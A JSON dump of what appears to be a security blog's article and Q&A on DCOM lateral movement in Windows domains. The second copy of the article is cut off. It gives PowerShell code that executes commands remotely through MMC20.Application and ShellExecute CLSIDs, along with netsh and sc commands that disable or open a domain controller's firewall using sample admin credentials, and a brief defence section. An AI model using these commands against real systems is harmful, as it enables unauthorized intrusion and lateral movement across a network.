[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwTpuWTfuLdP73wBR6DslJN7x14WObV7zpMWPholI9zs":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},380,"What is DCOM and how can it be used for lateral movement in a domain environment?","DCOM (Distributed Component Object Model) allows software components to communicate across networked computers. Attackers can abuse DCOM objects like `MMC20.Application` to execute arbitrary programs on remote systems. This technique is detailed in [Domain Penetration - Executing Programs on Remote Systems Using DCOM](\u002Fnews\u002Fdomain-penetration-executing-programs-on-remote-systems-using-dcom). It bypasses traditional remote execution methods and works on Windows 7 through Windows 10, often requiring administrative credentials.","\u003Cp>DCOM (Distributed Component Object Model) allows software components to communicate across networked computers. Attackers can abuse DCOM objects like `MMC20.Application` to execute arbitrary programs on remote systems. This technique is detailed in [Domain Penetration - Executing Programs on Remote Systems Using DCOM](\u002Fnews\u002Fdomain-penetration-executing-programs-on-remote-systems-using-dcom). It bypasses traditional remote execution methods and works on Windows 7 through Windows 10, often requiring administrative credentials.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-executing-programs-on-remote-systems-using-dcom\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-dcom-and-how-can-it-be-used-for-lateral-movement-in-a-domain-environment-1777483721711","DCOM, lateral movement, MMC20.Application, remote execution, domain penetration",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},96,"Domain Penetration - Executing Programs on Remote Systems Using DCOM","domain-penetration-executing-programs-on-remote-systems-using-dcom","Learn how to use DCOM for remote program execution in domain environments, including exploitation methods, firewall tips, and defensive strategies for cybersecurity.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article titled \"Techniques for Executing Programs on Remote Systems,\" common methods for program execution in domain environments were summarized: at, psexec, WMIC, wmiexec, smbexec, and PowerShell remoting. This article will detail the method of using DCOM to execute programs in domain environments, based on the research by Matt Nelson‏ @enigma0x3, and analyze related offensive and defensive strategies.\u003C\u002Fp>\u003Cp>Learning links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fenigma0x3.net\u002F2017\u002F01\u002F05\u002Flateral-movement-using-the-mmc20-application-com-object\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fenigma0x3.net\u002F2017\u002F01\u002F23\u002Flateral-movement-via-dcom-round-2\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Using DCOM\u003C\u002Fli>\u003Cli>Practical Exploitation Strategies\u003C\u002Fli>\u003Cli>Tips for Configuring Firewalls via Command Line\u003C\u002Fli>\u003Cli>Defensive Strategies\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Using DCOM\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Relevant basic knowledge is omitted. For an introduction to DCOM, please refer to the following links:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc226801.aspx\u003C\u002Fp>\u003Cp>http:\u002F\u002Fblog.csdn.net\u002Fervinsas\u002Farticle\u002Fdetails\u002F36424127\u003C\u002Fp>\u003Cp>This section mainly reproduces the primary exploitation methods from Matt Nelson‏ @enigma0x3's blog.\u003C\u002Fp>\u003Cp>\u003Cstrong>Obtain the list of DCOM applications:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerShell code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-CimInstance Win32_DCOMApplication\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-CimInstance is only applicable to PowerShell 3.0 and above. Windows 7 defaults to version 2.0, which does not support it. You can use the following alternative command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_DCOMApplication\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Of course, you can also directly use wmic for querying. The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_DCOMApplication GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>PowerShell calls to WMI can be replaced with wmic commands. For details, please refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002F某开源项目\u002FStudy-Notes-of-WMI-Persistence-using-wmic.exe\u003C\u002Fp>\u003Ch3>1. Local machine testing\u003C\u002Fh3>\u003Cp>Administrator privileges, PowerShell code is as follows:\u003C\u002Fp>\u003Cp>Get the supported operations of \"MMC20.Application\":\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"127.0.0.1\"))\u003Cbr>$com.Document.ActiveView | Get-Member\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017372768_0_512ff002ee.jpeg\">\u003C\u002Fp>\u003Cp>View the parameter description corresponding to ExecuteShellCommand:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com.Document.ActiveView.ExecuteShellCommand\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017395334_1_6c941f1fa6.jpeg\">\u003C\u002Fp>\u003Cp>For the specific meanings of the parameters corresponding to ExecuteShellCommand, refer to the following link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Faa815396(v=vs.85).aspx\u003C\u002Fp>\u003Cp>Execute a program via ExecuteShellCommand:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"127.0.0.1\"))\u003Cbr>$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,\"\u002Fc calc.exe\",\"Minimized\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Remote System Testing\u003C\u002Fh3>\u003Cp>Test Environment: Domain Environment\u003C\u002Fp>\u003Cp>Client: Firewall Disabled\u003C\u002Fp>\u003Cp>Server: Obtain the password of the built-in administrator account on the domain host, allowing net use connection to Client\u003C\u002Fp>\u003Cp>Server-side administrator privileges can choose to execute the following PowerShell code:\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Invoke MMC20.Application\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"192.168.0.2\"))\u003Cbr>$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,\"\u002Fc calc.exe\",\"Minimized\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Operation as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017437921_2_da5f3e47d0.jpeg\">\u003C\u002Fp>\u003Cp>Check the program list on the Client side; the launched calc.exe username is test2 (the currently logged-in user on the Client side is a), as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017466075_3_04fedea1ae.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Invoke '9BA05972-F6A8-11CF-A442-00A0C90A8F39'\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',\"192.168.0.2\")\u003Cbr>$obj = [System.Activator]::CreateInstance($com)\u003Cbr>$item = $obj.item()\u003Cbr>$item.Document.Application.ShellExecute(\"cmd.exe\",\"\u002Fc calc.exe\",\"c:\\windows\\system32\",$null,0)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Client-side view of the process list, the launched calc.exe username is a (same as the currently logged-in username on the Client side), as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017480667_4_db64d960b5.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above two methods are applicable to Win7-Win10\u003C\u002Fp>\u003Cp>\u003Cstrong>3. Call 'C08AFD90-F2A1-11D1-8455-00A0C91F3880'\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',\"192.168.0.2\")\u003Cbr>$obj = [System.Activator]::CreateInstance($com)\u003Cbr>$obj.Document.Application.ShellExecute(\"cmd.exe\",\"\u002Fc calc.exe\",\"c:\\windows\\system32\",$null,0)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This method is not applicable to Win7, but applicable to Win10 and Server2012 R2\u003C\u002Fp>\u003Ch2>0x03 Practical Exploitation Ideas\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Approach 1: The domain environment does not have the firewall enabled, use directly\u003C\u002Fh3>\u003Cp>Of course, it is necessary to obtain the password of the built-in domain account administrator\u003C\u002Fp>\u003Cp>The method will not be elaborated further\u003C\u002Fp>\u003Ch3>Approach 2: The firewall is enabled by default, modify the local configuration to disable the firewall\u003C\u002Fh3>\u003Cp>In this way, other hosts can remotely operate this host, and can\u003Cstrong>respectively\u003C\u002Fstrong>be achieved through the following methods\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Enable DCOM support by configuring inbound rules\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command line code to open any port is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall firewall add rule name=\"any\" protocol=TCP dir=in localport=any action=allow\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>DCOM communication ports are dynamically assigned by RPC and are not fixed, so set the inbound port rule to any\u003C\u002Fp>\u003Cp>After adding, the added inbound rule can be found in the firewall advanced features panel, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017490417_5_3da9da8040.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Disable firewall functionality\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The service name corresponding to Windows Firewall is mpssvc. The firewall service can be remotely stopped using the sc command, as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sc \\\\192.168.0.2 stop mpssvc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, stopping the firewall service does not disable the firewall functionality. The following command is required to disable the firewall functionality:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile state off\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Additional command to enable firewall functionality:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile state on\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>3. Setting inbound rules through firewall profiles\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The default firewall configuration rules are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Block inbound connections that do not match a rule\u003C\u002Fli>\u003Cli>Allow outbound connections that do not match a rule\u003C\u002Fli>\u003C\u002Ful>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017500038_6_a278a5e4b4.jpeg\">\u003C\u002Fp>\u003Cp>Modify the rules to allow inbound connections that do not match a rule, using the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile firewallpolicy allowinbound,allowoutbound\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After modification, the modified configuration can be viewed through the advanced panel, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017507089_7_265eea3662.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the firewall status triggers an alarm, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017512522_8_65dd3de9b9.jpeg\">\u003C\u002Fp>\u003Cp>The command to restore the firewall configuration is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile firewallpolicy blockinbound,allowoutbound\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Approach Three: Remotely Modify Firewall Configuration\u003C\u002Fh3>\u003Cp>You can use netsh to remotely configure firewall rules, requiring knowledge of the username and password. Execute the following command with administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall set currentprofile firewallpolicy allowinbound,allowoutbound\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For the current profile (i.e., the domain profile):\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile settings remotemanagement enable\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For all profiles, you can use:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set allprofiles settings remotemanagement enable\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The error is as follows:\u003C\u002Fp>\u003Cp>`An error occurred while attempting to connect to the remote computer. Make sure\u003C\u002Fp>\u003Cp>that the Windows Firewall service on the remote computer is running and configur\u003C\u002Fp>\u003Cp>ed to allow remote management, and then try your request again.`\u003C\u002Fp>\u003Cp>Indicates that the remote computer does not allow remote management. The following settings are required on the remote computer:\u003C\u002Fp>\u003Cp>\u003Cstrong>Allow Windows Firewall remote management\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Not supported by default. Check the box to enable, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017517713_9_814e28c43a.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This operation can be performed via command line with local administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile settings remotemanagement enable\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After enabling this feature, other hosts can remotely manage the local firewall configuration:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall firewall add rule name=\"any\" protocol=TCP dir=in localport=any action=allow\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017522063_10_b105ba7415.jpeg\">\u003C\u002Fp>\u003Cp>In summary, the approach to remotely execute programs on a domain controller using DCOM is as follows:\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Obtain domain controller privileges\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Including the password of the built-in administrator account on the domain controller. If the domain controller's firewall is disabled, programs can be executed remotely directly.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If you wish to use other accounts for remote connections, you need to first access COM security via dcomcnfg.exe to activate the user's remote launch and remote activation properties.\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Pre-set backdoor\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If the domain controller's firewall is enabled, DCOM cannot be used directly for remote execution. You need to obtain permission to remotely modify firewall configurations, which can be achieved by enabling Windows Firewall remote management (disabled by default).\u003C\u002Fp>\u003Cp>This operation requires a 3389 connection to the domain controller or using other methods to execute code on the domain controller host, with administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh advfirewall set currentprofile settings remotemanagement enable\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>3. Open ports remotely\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Use netsh to remotely modify the domain controller's firewall rules to open ports.\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall firewall add rule name=\"any\" protocol=TCP dir=in localport=any action=allow\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>4. Remote execution\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Use net use for remote connection, then execute the following PowerShell code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',\"192.168.0.2\")\u003Cbr>$obj = [System.Activator]::CreateInstance($com)\u003Cbr>$item = $obj.item()\u003Cbr>$item.Document.Application.ShellExecute(\"cmd.exe\", \"\u002Fc calc.exe\", \"c:\\\\windows\\\\system32\", $null, 0)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When using '9BA05972-F6A8-11CF-A442-00A0C90A8F39', the executing program runs under the currently logged-in user's account.\u003C\u002Fp>\u003Cp>\u003Cstrong>5. Remotely restore domain controller firewall settings\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>netsh -r 192.168.0.2 -u TEST\\administrator -p domain123! advfirewall firewall Delete rule name=\"any\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>To defend against DCOM remote program execution, simply enable the firewall.\u003C\u002Fp>\u003Cp>You can also disable the built-in Administrator account's remote launch and remote activation permissions for COM. Command as follows:\u003C\u002Fp>\u003Cp>dcomcnfg.exe\u003C\u002Fp>\u003Cp>Open Component Services - My Computer - Properties - COM Security - Launch and Activation Permissions - Edit Default, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017524995_11_eed8b78855.jpeg\">\u003C\u002Fp>\u003Cp>Of course, analyzing characteristics through packet capture is also feasible.\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article analyzes the exploitation methods of using DCOM to execute programs, and finally thanks Matt Nelson‏ @enigma0x3 for sharing his article.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article titled \"Techniques for Executing Programs on Remote Systems,\" common methods for program execution in domain environments were summarized: at, psexec, WMIC, wmiexec, smbexec, and PowerShell remoting. This article will detail the method of using DCOM to execute programs in domain environments, based on the research by Matt Nelson‏ @enigma0x3, and analyze related offensive and defensive strategies.\u003C\u002Fp>\u003Cp>Learning links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fenigma0x3.net\u002F2017\u002F01\u002F05\u002Flateral-movement-using-the-mmc20-application-com-object\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fenigma0x3.net\u002F2017\u002F01\u002F23\u002Flateral-movement-via-dcom-round-2\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Using DCOM\u003C\u002Fli>\u003Cli>Practical Exploitation Strategies\u003C\u002Fli>\u003Cli>Tips for Configuring Firewalls via Command Line\u003C\u002Fli>\u003Cli>Defensive Strategies\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Using DCOM\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Relevant basic knowledge is omitted. For an introduction to DCOM, please refer to the following links:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Fcc226801.aspx\u003C\u002Fp>\u003Cp>http:\u002F\u002Fblog.csdn.net\u002Fervinsas\u002Farticle\u002Fdetails\u002F36424127\u003C\u002Fp>\u003Cp>This section mainly reproduces the primary exploitation methods from Matt Nelson‏ @enigma0x3's blog.\u003C\u002Fp>\u003Cp>\u003Cstrong>Obtain the list of DCOM applications:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PowerShell code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-CimInstance Win32_DCOMApplication\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-CimInstance is only applicable to PowerShell 3.0 and above. Windows 7 defaults to version 2.0, which does not support it. You can use the following alternative command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_DCOMApplication\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Of course, you can also directly use wmic for querying. The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_DCOMApplication GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>PowerShell calls to WMI can be replaced with wmic commands. For details, please refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002F某开源项目\u002FStudy-Notes-of-WMI-Persistence-using-wmic.exe\u003C\u002Fp>\u003Ch3>1. Local machine testing\u003C\u002Fh3>\u003Cp>Administrator privileges, PowerShell code is as follows:\u003C\u002Fp>\u003Cp>Get the supported operations of \"MMC20.Application\":\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"127.0.0.1\"))\u003Cbr>$com.Document.ActiveView | Get-Member\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017372768_0_512ff002ee-1.jpeg\">\u003C\u002Fp>\u003Cp>View the parameter description corresponding to ExecuteShellCommand:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com.Document.ActiveView.ExecuteShellCommand\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017395334_1_6c941f1fa6-1.jpeg\">\u003C\u002Fp>\u003Cp>For the specific meanings of the parameters corresponding to ExecuteShellCommand, refer to the following link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Faa815396(v=vs.85).aspx\u003C\u002Fp>\u003Cp>Execute a program via ExecuteShellCommand:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"127.0.0.1\"))\u003Cbr>$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,\"\u002Fc calc.exe\",\"Minimized\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Remote System Testing\u003C\u002Fh3>\u003Cp>Test Environment: Domain Environment\u003C\u002Fp>\u003Cp>Client: Firewall Disabled\u003C\u002Fp>\u003Cp>Server: Obtain the password of the built-in administrator account on the domain host, allowing net use connection to Client\u003C\u002Fp>\u003Cp>Server-side administrator privileges can choose to execute the following PowerShell code:\u003C\u002Fp>\u003Cp>\u003Cstrong>1. Invoke MMC20.Application\u003C\u002Fstrong>\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$com = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"192.168.0.2\"))\u003Cbr>$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,\"\u002Fc calc.exe\",\"Minimized\")\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Operation as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017437921_2_da5f3e47d0-1.jpeg\">\u003C\u002Fp>\u003Cp>Check the program list on the Client side; the launched calc.exe username is test2 (the currently logged-in user on the Client side is a), as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017466075_3_04fedea1ae-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>2. Invoke 